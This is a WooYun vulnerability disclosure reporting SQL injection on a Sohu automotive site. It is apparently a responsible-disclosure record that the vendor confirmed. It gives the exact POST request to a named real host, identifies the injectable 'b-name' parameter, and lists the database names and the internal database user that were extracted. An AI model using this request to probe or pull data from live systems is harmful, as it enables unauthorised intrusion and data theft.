当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0203643

漏洞标题:搜狐某站MySQL注射(附验证脚本)

相关厂商:搜狐

漏洞作者: Aasron

提交时间:2016-04-30 10:32

修复时间:2016-06-14 10:50

公开时间:2016-06-14 10:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-30: 细节已通知厂商并且等待厂商处理中
2016-04-30: 厂商已经确认,细节仅向厂商公开
2016-05-10: 细节向核心白帽子及相关领域专家公开
2016-05-20: 细节向普通白帽子公开
2016-05-30: 细节向实习白帽子公开
2016-06-14: 细节向公众公开

简要描述:

搜狐某站MySQL注射

详细说明:

拿自己写的神器扫扫试试

POST /baike_upload/handleForm.sip HTTP/1.1
Host: db.auto.sohu.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://db.auto.sohu.com/baike_upload/baike_update.sip?id=31
Cookie: xxxx
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 2130
carPic=&b-name=%CD%A8%B7%E7%D7%F9%D2%CE&feeling=%09%26%23160%3B%A1%BE%CB%D1%BA%FC%C6%FB%B3%B5%A1%A1%C3%FB%B4%CA%BD%E2%CA%CD%A1%BF%CD%A8%B7%E7%D7%F9%D2%CE%A3%BA%D2%BB%D6%D6%C6%FB%B3%B5%BF%D5%B5%F7%CD%A8%B7%E7%D7%F9%D2%CE%A3%AC%CB%FC%B0%FC%C0%A8%D3%D0%D2%CE%D7%F9%BA%CD%BF%BF%B1%B3%A3%AC%D4%DA%D2%CE%D7%F9%B5%C4%C9%CF%B1%ED%C3%E6%D2%CE%CC%D7%CF%C2%B5%C4%D2%CE%D7%F9%C4%DA%C9%E8%D6%C3%D3%D0%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%A3%AC%D4%DA%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%CF%C2%B2%BF%B5%C4%D7%F9%D2%CE%C4%DA%C9%E8%D6%C3%D3%D0%CF%F2%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%CA%E4%CB%CD%BF%D5%B5%F7%B7%E7%B5%C4%D2%FD%B7%E7%BB%FA%A3%BB%D4%DA%BF%BF%B1%B3%B5%C4%C7%B0%B1%ED%C3%E6%BF%BF%B1%B3%CC%D7%BA%F3%B2%BF%B5%C4%BF%BF%B1%B3%C4%DA%C9%E8%D6%C3%D3%D0%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%A3%AC%D4%DA%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%BA%F3%B2%BF%B5%C4%BF%BF%B1%B3%C4%DA%C9%E8%D6%C3%D3%D0%CF%F2%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%CA%E4%CB%CD%BF%D5%B5%F7%B7%E7%B5%C4%D2%FD%B7%E7%BB%FA%A1%A3%CE%AA%C1%CB%CA%B9%D3%C3%B7%BD%B1%E3%A3%AC%D4%DA%D2%CE%D7%F9%B5%C4%B2%E0%B1%DA%C9%CF%C9%E8%D6%C3%D3%D0%BF%D8%D6%C6%D2%FD%B7%E7%BB%FA%B9%A4%D7%F7%D7%B4%CC%AC%B5%C4%CE%A2%B5%F7%BF%AA%B9%D8%A1%A3%CE%AA%C1%CB%CC%E1%B8%DF%CD%A8%B7%E7%D0%A7%B9%FB%A3%AC%D4%DA%D2%CE%D7%F9%B5%C4%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%C9%CF%B5%C4%D2%CE%CC%D7%B1%ED%C3%E6%C9%E8%D3%D0%D0%A1%B3%F6%C6%F8%BF%D7%A3%BB%D4%DA%BF%BF%B1%B3%B5%C4%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%B5%C4%BF%BF%B1%B3%CC%D7%B1%ED%C3%E6%C9%E8%D3%D0%D0%A1%B3%F6%C6%F8%BF%D7%A1%A3%B1%BE%CA%B5%D3%C3%D0%C2%D0%CD%B5%C4%D3%D0%D2%E6%D0%A7%B9%FB%CA%C7%A3%BA%BD%E1%B9%B9%BC%F2%B5%A5%A1%A2%CA%B9%D3%C3%B7%BD%B1%E3%A1%A2%B0%B2%D7%B0%BC%BC%CA%F5%BC%F2%B5%A5%A3%AC%C7%D2%B2%BB%C6%C6%BB%B5%C6%FB%B3%B5%D2%CE%D7%D3%BD%E1%B9%B9%D3%EB%CD%E2%B9%DB%A3%AC%C4%DC%B4%EF%B5%BD%BD%DA%C4%DC%BB%B7%B1%A3%CE%C0%C9%FA%B5%C4%B9%A6%C4%DC%A1%A3%0D%0A%0D%0A%09%0D%0A%09%09%0D%0A%09%09%09%0D%0A%09%09%09%09%0D%0A%09%09%0D%0A%09%09%0D%0A%09%09%09%0D%0A%09%09%09%09%26%23160%3B%0D%0A%09%09%0D%0A%09%0D%0A%0D%0A%0D%0A%0D%0A%09%26%23160%3B%0D%0A


注入参数#b-name

漏洞证明:

available databases [7]:
[*] auto_bmw
[*] auto_search
[*] auto_warehouse
[*] information_schema
[*] sohu_priceinfo
[*] tmp
[*] usedcar


当前数据库用户:'wanjiang@10.%'


当前数据库:'auto_warehouse'


修复方案:

过滤

版权声明:转载请注明来源 Aasron@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-04-30 10:42

厂商回复:

感谢提供

最新状态:

暂无


漏洞评价:

评价